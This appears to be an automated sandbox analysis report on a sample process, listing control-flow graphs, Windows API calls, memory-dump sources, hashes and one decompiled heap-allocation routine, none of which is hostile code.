                          control_flow_graph 316 4c702d2-4c702f6 317 4c702fb-4c70304 316->317 318 4c702f8 316->318 319 4c70306-4c7030e SetCurrentDirectoryW 317->319 320 4c70345-4c7034a 317->320 318->317 321 4c70314-4c70326 319->321 320->319 323 4c7034c-4c70351 321->323 324 4c70328-4c70344 321->324 323->324
                          APIs
                          • SetCurrentDirectoryW.KERNELBASE(?), ref: 04C7030C
                          Memory Dump Source
                          • Source File: 00000004.00000002.725426761.0000000004C70000.00000040.00000001.sdmp, Offset: 04C70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_4c70000_rstmgknbahw.jbxd
                          Similarity
                          • API ID: CurrentDirectory
                          • String ID:
                          • API String ID: 1611563598-0
                          • Opcode ID: cba8787a6df6210c8464f0cb995a0beee91737829fd51b4e8583b0c6e520bd55
                          • Instruction ID: 41395341e8a0e2659264a18f8fad8b12a8b3511d081ebfbf332d1501dee76dea
                          • Opcode Fuzzy Hash: cba8787a6df6210c8464f0cb995a0beee91737829fd51b4e8583b0c6e520bd55
                          • Instruction Fuzzy Hash: 14017172A053408FDB60CF6BD885766FB94EF00720F08C4AAED49CF646E674E508CB62
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 326 4c7023e-4c70268 327 4c70293-4c70298 326->327 328 4c7026a-4c7027d DispatchMessageW 326->328 327->328 329 4c7027f-4c70292 328->329 330 4c7029a-4c7029f 328->330 330->329
                          APIs
                          • DispatchMessageW.USER32(?), ref: 04C70270
                          Memory Dump Source
                          • Source File: 00000004.00000002.725426761.0000000004C70000.00000040.00000001.sdmp, Offset: 04C70000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_4c70000_rstmgknbahw.jbxd
                          Similarity
                          • API ID: DispatchMessage
                          • String ID:
                          • API String ID: 2061451462-0
                          • Opcode ID: d82a08c71457e1b3d3442eb6ce44c40a23858c62e89ca85e1a9a158bf998652d
                          • Instruction ID: e005d2a1b0371d5f52885469d9284c7c8c976a8032a8e97626570487f36490b7
                          • Opcode Fuzzy Hash: d82a08c71457e1b3d3442eb6ce44c40a23858c62e89ca85e1a9a158bf998652d
                          • Instruction Fuzzy Hash: B6F0AF369087409FDB608F07D884765FFA0EF04320F08C0AADE494B656E279F508CFA2
                          Uniqueness

                          Uniqueness Score: -1.00%

                          C-Code - Quality: 94%
                          			E00403E3D(void* __ecx, long _a4) {
                          				void* _t4;
                          				void* _t6;
                          				void* _t7;
                          				long _t8;
                          
                          				_t7 = __ecx;
                          				_t8 = _a4;
                          				if(_t8 > 0xffffffe0) {
                          					L7:
                          					 *((intOrPtr*)(E00404831())) = 0xc;
                          					__eflags = 0;
                          					return 0;
                          				}
                          				if(_t8 == 0) {
                          					_t8 = _t8 + 1;
                          				}
                          				while(1) {
                          					_t4 = RtlAllocateHeap( *0x4132b0, 0, _t8); // executed
                          					if(_t4 != 0) {
                          						break;
                          					}
                          					__eflags = E00403829();
                          					if(__eflags == 0) {
                          						goto L7;
                          					}
                          					_t6 = E004068FD(_t7, __eflags, _t8);
                          					_pop(_t7);
                          					__eflags = _t6;
                          					if(_t6 == 0) {
                          						goto L7;
                          					}
                          				}
                          				return _t4;
                          			}







                          0x00403e3d
                          0x00403e43
                          0x00403e49
                          0x00403e7b
                          0x00403e80
                          0x00403e86
                          0x00000000
                          0x00403e86
                          0x00403e4d
                          0x00403e4f
                          0x00403e4f
                          0x00403e66
                          0x00403e6f
                          0x00403e77
                          0x00000000
                          0x00000000
                          0x00403e57
                          0x00403e59
                          0x00000000
                          0x00000000
                          0x00403e5c
                          0x00403e61
                          0x00403e62
                          0x00403e64
                          0x00000000
                          0x00000000
                          0x00403e64
                          0x00000000

                          APIs
                          • RtlAllocateHeap.NTDLL(00000000,?,00000004,?,00407C67,?,00000000,?,004067DA,?,00000004,?,?,?,?,00403B03), ref: 00403E6F
                          Memory Dump Source
                          • Source File: 00000004.00000001.703365040.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_1_400000_rstmgknbahw.jbxd
                          Yara matches
                          Similarity
                          • API ID: AllocateHeap
                          • String ID:
                          • API String ID: 1279760036-0
                          • Opcode ID: a4c9c6b9c171d7e3068f9dcb93680387a8cae48819217d3cebbdef174e207782
                          • Instruction ID: 2c5ed35c3885d6f2518923907421e71a1374dda36297243b1d9f5d3b1e0eb56a
                          • Opcode Fuzzy Hash: a4c9c6b9c171d7e3068f9dcb93680387a8cae48819217d3cebbdef174e207782
                          • Instruction Fuzzy Hash: 54E03922505222A6D6213F6ADC04F5B7E4C9F817A2F158777AD15B62D0CB389F0181ED
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 349 25520d0-25520ea 353 2552195-2552198 349->353 354 25520ef-25520f2 353->354 355 255219e-25521a5 353->355 356 25521a6-25521c2 354->356 357 25520f8-25520fe 354->357 364 25521f5-2552212 356->364 365 25521c4 356->365 358 2552100-2552106 357->358 359 2552118-2552147 357->359 360 2552108 358->360 361 255210a-2552116 358->361 359->356 368 2552126-2552143 359->368 360->359 361->359 418 2552217 call 23805ad 364->418 419 2552217 call 23805bf 364->419 420 2552217 call 23805f6 364->420 421 25521c6 call 25523a0 365->421 422 25521c6 call 23805ad 365->422 423 25521c6 call 23805bf 365->423 424 25521c6 call 25525de 365->424 425 25521c6 call 23805f6 365->425 378 2552145-255216d 368->378 379 255216f-255218b 368->379 369 25521cc-25521e1 373 255221d-2552270 390 255223c-2552274 373->390 386 2552193-2552194 378->386 379->386 386->353 396 2552283-2552285 390->396 397 255225e-2552281 390->397 398 2552288-255228c 396->398 397->398 400 2552295-2552299 398->400 401 255228e 398->401 402 25522a8-25522aa 400->402 403 255229b-25522a6 400->403 401->400 405 25522ad-25522ba 402->405 403->405 408 25522d0-25522d4 405->408 409 25522bc-25522ce 405->409 411 25522e6-255230d 408->411 412 25522d6-25522e4 408->412 410 2552333-255233f 409->410 416 255231f-255232c 411->416 417 255230f-255231d 411->417 412->410 416->410 417->410 418->373 419->373 420->373 421->369 422->369 423->369 424->369 425->369
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.725094194.0000000002550000.00000040.00000001.sdmp, Offset: 02550000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2550000_rstmgknbahw.jbxd
                          Similarity
                          • API ID:
                          • String ID: r*+
                          • API String ID: 0-3221063712
                          • Opcode ID: e441ae31fce197191459f86fb955afd528597058b49e9cbdaafcfca2ce724b74
                          • Instruction ID: 9a9ba770c7c36654d5b8420177f2205e19d3f8740ac1bae939549c35538e61bb
                          • Opcode Fuzzy Hash: e441ae31fce197191459f86fb955afd528597058b49e9cbdaafcfca2ce724b74
                          • Instruction Fuzzy Hash: EF713D34E09219DFCB44DFA8C4A56BEBBB2FF44300F1084AADD06DB255DB709941CB9A
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 426 25502e8-2550316 427 2550318-2550324 426->427 428 255032a-2550337 426->428 427->428 431 2550506-2550510 427->431 432 25503a5-25503b8 428->432 433 2550339-2550353 428->433 439 25503bf-25503d0 432->439 436 2550355 433->436 437 2550357 433->437 438 255035a-255036d 436->438 437->438 444 2550373-255038a 438->444 446 255051c-2550575 438->446 439->444 445 25503d2-25503dc 439->445 452 255038c 444->452 453 255038e 444->453 447 25503ef 445->447 448 25503de-25503e5 445->448 470 2550577-25505b5 446->470 471 255059a 446->471 451 25503f6-25504df 447->451 448->447 464 25504e1 451->464 465 25504e3 451->465 455 2550391-25503a3 452->455 453->455 455->445 466 25504e6-25504fb 464->466 465->466 466->431 470->471
                          Strings
                          Memory Dump Source
                          • Source File: 00000004.00000002.725094194.0000000002550000.00000040.00000001.sdmp, Offset: 02550000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2550000_rstmgknbahw.jbxd
                          Similarity
                          • API ID:
                          • String ID: :@fq
                          • API String ID: 0-3673016210
                          • Opcode ID: b4fdd09f1dbc4f3b0018ebb53425a58758e37a6887519c0e655f3638d3d3ee32
                          • Instruction ID: 9952e570698b5ed75f71f700e1dc64b788246ad990f2dbcf6cbb8b89c78d710b
                          • Opcode Fuzzy Hash: b4fdd09f1dbc4f3b0018ebb53425a58758e37a6887519c0e655f3638d3d3ee32
                          • Instruction Fuzzy Hash: 46517D70A05215CFCB14DF68C0A46AEBBF2FF8D300F25886AD9069B395DB31AC46CB55
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000004.00000002.725094194.0000000002550000.00000040.00000001.sdmp, Offset: 02550000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2550000_rstmgknbahw.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: df1f239054af878372595883da50d78680894b3459619e580c6d37aaaeca9864
                          • Instruction ID: 4f2fca6b0e054d6e410cfd7950fa28c78ca6246561bbfa1ad88e54561b32590d
                          • Opcode Fuzzy Hash: df1f239054af878372595883da50d78680894b3459619e580c6d37aaaeca9864
                          • Instruction Fuzzy Hash: CA220134A00A15CFCB64DF68C494A6ABBF2FF48304F14C99AD85A9B71ADB34AD45CF44
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000004.00000002.725094194.0000000002550000.00000040.00000001.sdmp, Offset: 02550000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2550000_rstmgknbahw.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0191efe0898f7bc92d89f8656da1319b7ed1ba070b63501aa6741c9ad6e4a538
                          • Instruction ID: 27c9b905de9c287b97c456b14ff87c661dc38c84f10154e904651abea05b75ed
                          • Opcode Fuzzy Hash: 0191efe0898f7bc92d89f8656da1319b7ed1ba070b63501aa6741c9ad6e4a538
                          • Instruction Fuzzy Hash: 1F51E931B00625DFCB159BB8D8A46AEB7F7BF48314F204556E946DB294EB30DD05CB84
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000004.00000002.725094194.0000000002550000.00000040.00000001.sdmp, Offset: 02550000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2550000_rstmgknbahw.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ca0f714be1f01ad168710b91f0c4256800ae27410027d94c541c390887fb7177
                          • Instruction ID: 0acaffb263d745fad723aff5bd8b66a851a6686a16363f445e86eadc8fd3d98b
                          • Opcode Fuzzy Hash: ca0f714be1f01ad168710b91f0c4256800ae27410027d94c541c390887fb7177
                          • Instruction Fuzzy Hash: 4641A531B041188FC7159B68C4646AEB7E7BF8A310F15846AEC069F3A1DE729D0AC795
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000004.00000002.725094194.0000000002550000.00000040.00000001.sdmp, Offset: 02550000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2550000_rstmgknbahw.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 9a5034dedb30274afb0dd129eeb98a4f3c3d25582e92143fa852cd436c961dd3
                          • Instruction ID: c9b119559da32c2380ffc61357fd5d83828ec4330c8775477da24472b3cc9e42
                          • Opcode Fuzzy Hash: 9a5034dedb30274afb0dd129eeb98a4f3c3d25582e92143fa852cd436c961dd3
                          • Instruction Fuzzy Hash: 2641DF71A902158FCB047BB4F82C66D7BA3BF847157048D6AF802CB2A9DF708C51DB95
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000004.00000002.725094194.0000000002550000.00000040.00000001.sdmp, Offset: 02550000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2550000_rstmgknbahw.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: c4f391878be01dfcea7f46c3567436fa3c1089565c89ffa6856c76434415543e
                          • Instruction ID: d046ca85d2cf9a04b8bdc675efb93256a31a4f43580444cae9e2f3199e6a1abd
                          • Opcode Fuzzy Hash: c4f391878be01dfcea7f46c3567436fa3c1089565c89ffa6856c76434415543e
                          • Instruction Fuzzy Hash: 5251F934A01619CFDB54EF64C898B9DBBB2BF48304F1081DAD80AAB365DB359D84CF51
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000004.00000002.725094194.0000000002550000.00000040.00000001.sdmp, Offset: 02550000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2550000_rstmgknbahw.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f9645f179b3ef20b27d0120613276596979ea8da4f7b7078d3cdec7c858b7926
                          • Instruction ID: f1dc7c62f0a8f7e2e0995b7bf4cbc09ccf76c5d284b0d2f84416959d3ff33d36
                          • Opcode Fuzzy Hash: f9645f179b3ef20b27d0120613276596979ea8da4f7b7078d3cdec7c858b7926
                          • Instruction Fuzzy Hash: F1418D70A15215DFDB14CF68C0A4BAEBBB6FF8C310F15486AD902AB394DB31AC45CB59
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000004.00000002.725094194.0000000002550000.00000040.00000001.sdmp, Offset: 02550000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2550000_rstmgknbahw.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7924d36be12cd55d43ba026cd9c346287756d0fee356a30089661ee19f7f7bb8
                          • Instruction ID: 39067a1abed76c927592fa26e3a6d763cdde2dcbaa55dd740fe12edf11daa19c
                          • Opcode Fuzzy Hash: 7924d36be12cd55d43ba026cd9c346287756d0fee356a30089661ee19f7f7bb8
                          • Instruction Fuzzy Hash: DA410534A04629CFCB50EB65D8A4B9DBBB2BF49344F1084EAD80EAB355DB309D84CF55
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000004.00000002.725094194.0000000002550000.00000040.00000001.sdmp, Offset: 02550000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2550000_rstmgknbahw.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 2ec8b7b61112c62e192c816540d74f8c0b2b39ee60599d540c4447cf2668eba0
                          • Instruction ID: 692965943033b340b80dc6d277065d8bddf1862821e8d1602d320e7161e9598b
                          • Opcode Fuzzy Hash: 2ec8b7b61112c62e192c816540d74f8c0b2b39ee60599d540c4447cf2668eba0
                          • Instruction Fuzzy Hash: B531B03050E3C19FCB03AB7498795A93FB5EE46304B0949CBD881CB1A7DA359809C72B
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000004.00000002.725094194.0000000002550000.00000040.00000001.sdmp, Offset: 02550000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2550000_rstmgknbahw.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e1b16c1a83af17540c76f1fc5cad6431956c1c10c9a98970056c8ed956ded142
                          • Instruction ID: 22b846d3fe0e952a8734f22926f49d6962360d5ee445012016bf91aba3a70af0
                          • Opcode Fuzzy Hash: e1b16c1a83af17540c76f1fc5cad6431956c1c10c9a98970056c8ed956ded142
                          • Instruction Fuzzy Hash: A4213730608261EFC7158B68DCA8A29BFE5BF46210F1989A7DC56CB653C771AC40C75A
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000004.00000002.725094194.0000000002550000.00000040.00000001.sdmp, Offset: 02550000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2550000_rstmgknbahw.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ba3d9be584447d565476d57126df57fd499e8717e4111f6b717c36eaa72a7ead
                          • Instruction ID: 04873d118f51d8c1484766e670bb7206a4a2aa48694dbde3ab5969d9b099c330
                          • Opcode Fuzzy Hash: ba3d9be584447d565476d57126df57fd499e8717e4111f6b717c36eaa72a7ead
                          • Instruction Fuzzy Hash: 0531AC70E00249CBDB60DFA5E45878ABBF2BF84314F24C66AC8059B255DBB49989CF85
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000004.00000002.725094194.0000000002550000.00000040.00000001.sdmp, Offset: 02550000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2550000_rstmgknbahw.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: b1e8c51b1b055bfd0cb027700a251b2d19c7c200325e28cc08bc66ad4460c82d
                          • Instruction ID: 633cdd3e43a5044d6ad5046d1fdb07d79bb9600f77ef288bac77ea674d3920ba
                          • Opcode Fuzzy Hash: b1e8c51b1b055bfd0cb027700a251b2d19c7c200325e28cc08bc66ad4460c82d
                          • Instruction Fuzzy Hash: 19313634E08219DFCB84DBA8C0656BDBBB1BF44304F1049AADC02EB665D731DA45CB5A
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000004.00000002.725094194.0000000002550000.00000040.00000001.sdmp, Offset: 02550000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2550000_rstmgknbahw.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8660dde167af3db32193b4fbc5810b483b680624c503a190a6371655c8da920a
                          • Instruction ID: 00e4577c693f8976441b15115a0d4f90646edfe7f45a7f8411d3c6709250a91c
                          • Opcode Fuzzy Hash: 8660dde167af3db32193b4fbc5810b483b680624c503a190a6371655c8da920a
                          • Instruction Fuzzy Hash: 3E210531A082768BCB14AFF1A4681FF7BB7BF95240B15496FDC02DB145DE318885CB96
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000004.00000002.725094194.0000000002550000.00000040.00000001.sdmp, Offset: 02550000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2550000_rstmgknbahw.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 374877ab5860e6bfb422461a3d4a3dd949c25cab1ca6e82d94c5ba3bdddc2ef3
                          • Instruction ID: 31fbdbbafb15e6f01adea66fd393eb033a1c1cd269b3d0011023ab147c42df31
                          • Opcode Fuzzy Hash: 374877ab5860e6bfb422461a3d4a3dd949c25cab1ca6e82d94c5ba3bdddc2ef3
                          • Instruction Fuzzy Hash: 7A11DA31A042368BDB14AFF5D4282BF76B7BF85340F51492F99079B644DE71C840C796
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000004.00000002.725019398.0000000002380000.00000040.00000040.sdmp, Offset: 02380000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2380000_rstmgknbahw.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 0746fe9a5e936d183c0a348e1a9081c7b76fee4c8b5391a15dbe5681313e0d52
                          • Instruction ID: e3fdff3f1e0f15da4ae8a8cd0765ffcf13d4b77f92ce397a59686ffe8bd55fd6
                          • Opcode Fuzzy Hash: 0746fe9a5e936d183c0a348e1a9081c7b76fee4c8b5391a15dbe5681313e0d52
                          • Instruction Fuzzy Hash: B811B130254788DFD715DB54C940B26BB96EF89718F28CAACE9490FA43C77BD803CA52
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000004.00000002.725094194.0000000002550000.00000040.00000001.sdmp, Offset: 02550000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2550000_rstmgknbahw.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: d1255e8143d82572c333878f8d68d1546432fd1bb58266ac1de6b7f062f99c1d
                          • Instruction ID: 44afb0c8fc5cdb0e77db9c0ea39397be9263c7cc746db3fb32e2c646e0b96777
                          • Opcode Fuzzy Hash: d1255e8143d82572c333878f8d68d1546432fd1bb58266ac1de6b7f062f99c1d
                          • Instruction Fuzzy Hash: 941182303086A08FC7169739D068AA97FF6BFC620071981EBD446CF276CE658C09CB56
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000004.00000002.725094194.0000000002550000.00000040.00000001.sdmp, Offset: 02550000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2550000_rstmgknbahw.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8e208018f646288c9cbafce815bf246acb0f005ffb65fc04e8738d660f913d2c
                          • Instruction ID: d28d5b85d27345897d7a5b11cc5b404fb5eec67c17437890beca9254b89a4c76
                          • Opcode Fuzzy Hash: 8e208018f646288c9cbafce815bf246acb0f005ffb65fc04e8738d660f913d2c
                          • Instruction Fuzzy Hash: AF0126213041610FC749327D84222BF779B9FCAA54318446FF042EF385CD68AC0793DA
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000004.00000002.725019398.0000000002380000.00000040.00000040.sdmp, Offset: 02380000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2380000_rstmgknbahw.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 6b836ea31deb8091f6029d15c0a09fd41ff9c19c5325f0265543586bfe514d36
                          • Instruction ID: 947079d3ddce1c640ee1ed7d3eb86f95ed86dd9b0a4a3dc04f91ffa05d1f2f57
                          • Opcode Fuzzy Hash: 6b836ea31deb8091f6029d15c0a09fd41ff9c19c5325f0265543586bfe514d36
                          • Instruction Fuzzy Hash: B801D8731097809FD725CF15AC51856FFE4EB41730B1884EFE84DCB212D525E509CB65
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000004.00000002.725019398.0000000002380000.00000040.00000040.sdmp, Offset: 02380000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2380000_rstmgknbahw.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7baa3fee72041d93880d98c232ab9886bb905370097aa98ea47db10454afc959
                          • Instruction ID: 67559a2efa4a1d4a1bba9a5c4b67cf4bbb730a6269125a81c0d1d13a1dac3627
                          • Opcode Fuzzy Hash: 7baa3fee72041d93880d98c232ab9886bb905370097aa98ea47db10454afc959
                          • Instruction Fuzzy Hash: 9F0188765497C16FD7118B16AC41853FFE8DB4663070884ABE889CB612D125B909CB61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000004.00000002.725094194.0000000002550000.00000040.00000001.sdmp, Offset: 02550000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2550000_rstmgknbahw.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7eb5bd2328a924e5ed2997f1f5dc0cd5bcd450b88ff7fc00adccf9cc3ab7193f
                          • Instruction ID: dd107337e1f86578974567e6c69e516644188cdfab10ac71ded3d8f832023871
                          • Opcode Fuzzy Hash: 7eb5bd2328a924e5ed2997f1f5dc0cd5bcd450b88ff7fc00adccf9cc3ab7193f
                          • Instruction Fuzzy Hash: AFF0B4713101250BC649767D942267F62CBABC9A58754442FF106EB388CD78AC0763DA
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000004.00000002.725094194.0000000002550000.00000040.00000001.sdmp, Offset: 02550000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2550000_rstmgknbahw.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 63c557081a99a98b9ee661c4f3d711914055093d8c2cbf9b035dd9eb2230aa82
                          • Instruction ID: 1aad6e99cc784c4af617121ed2659acee7e61a54e30e7d9bfcb8a356735aaa0d
                          • Opcode Fuzzy Hash: 63c557081a99a98b9ee661c4f3d711914055093d8c2cbf9b035dd9eb2230aa82
                          • Instruction Fuzzy Hash: BC0112303045208BC754A729D068A6D7BE6BFC570472585ABE80ACB765CF75DC49CB86
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000004.00000002.725094194.0000000002550000.00000040.00000001.sdmp, Offset: 02550000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2550000_rstmgknbahw.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 215e12476e48ded66bb2ec07ac5b580f65fe818d7987fc5be368e2265acf3a8c
                          • Instruction ID: 9332ca956396563b30cf291b3d9288e9afce11e55932bd2fbd2b21be12f4264d
                          • Opcode Fuzzy Hash: 215e12476e48ded66bb2ec07ac5b580f65fe818d7987fc5be368e2265acf3a8c
                          • Instruction Fuzzy Hash: 89F0E9309143648FD7405BF5C86465BBFF5BF4B700B0608979C42A7285D674AC11C295
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000004.00000002.725094194.0000000002550000.00000040.00000001.sdmp, Offset: 02550000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2550000_rstmgknbahw.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a2a8d428b995da80da501f6e51afb2f1846445733c47a777a780d3b527f36c9e
                          • Instruction ID: ee6ef0227eb3e2c581a50e8e781c5fa856799f52573e9d345fc94b46dded0113
                          • Opcode Fuzzy Hash: a2a8d428b995da80da501f6e51afb2f1846445733c47a777a780d3b527f36c9e
                          • Instruction Fuzzy Hash: 92E05532E142388BDB1019F598241AFBBB9B789750F000C239D0793288D9B08805C2C5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000004.00000002.725019398.0000000002380000.00000040.00000040.sdmp, Offset: 02380000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2380000_rstmgknbahw.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 8388fa57679453dc7b04d871bb3dcfd317d9f8cb342853e5fed44ee7779b5e3e
                          • Instruction ID: e2596816a01724f242e870bb6af5a110992d2b01e99cb0a638c102520b6fb05c
                          • Opcode Fuzzy Hash: 8388fa57679453dc7b04d871bb3dcfd317d9f8cb342853e5fed44ee7779b5e3e
                          • Instruction Fuzzy Hash: 50F0FB35144644DFC216DF44D540B25FBA2EB89718F24C6A9E9490BB52C737D813DA81
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000004.00000002.725019398.0000000002380000.00000040.00000040.sdmp, Offset: 02380000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2380000_rstmgknbahw.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 11c67c80068883e49bae94fe3105d40d7ea679bdfc3bd88d975237d133755c24
                          • Instruction ID: 6670f776e827fb206d5b0da2e69ad96aac7ad2864f69e4b3f96d54df65486fa2
                          • Opcode Fuzzy Hash: 11c67c80068883e49bae94fe3105d40d7ea679bdfc3bd88d975237d133755c24
                          • Instruction Fuzzy Hash: 5AE06D766006009BD650CF0AEC41456FB94EB84630B18C06BDC0D8B710E536F508CEA5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000004.00000002.725094194.0000000002550000.00000040.00000001.sdmp, Offset: 02550000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2550000_rstmgknbahw.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f52425f5462ace3ea09f423de64e4bfd012de213506d122a2dbf910bd21017dd
                          • Instruction ID: c394e598491147e0aeced129a4333231069624d0eba05ab500d885b343ac2347
                          • Opcode Fuzzy Hash: f52425f5462ace3ea09f423de64e4bfd012de213506d122a2dbf910bd21017dd
                          • Instruction Fuzzy Hash: C3D0123004C6A59FD24207A858767A47F24AB1B602F080DE3DCC6CD45292805013C756
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000004.00000002.725094194.0000000002550000.00000040.00000001.sdmp, Offset: 02550000, based on PE: false
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_4_2_2550000_rstmgknbahw.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 7a6946811a9a9c603f5db7da4e1dfa13e4c38613cc4d67a84e622527a162d05e
                          • Instruction ID: 9d0224e494977027372438cb6059d64cc57c49533b90b4f5544f3c786bc60cec
                          • Opcode Fuzzy Hash: 7a6946811a9a9c603f5db7da4e1dfa13e4c38613cc4d67a84e622527a162d05e
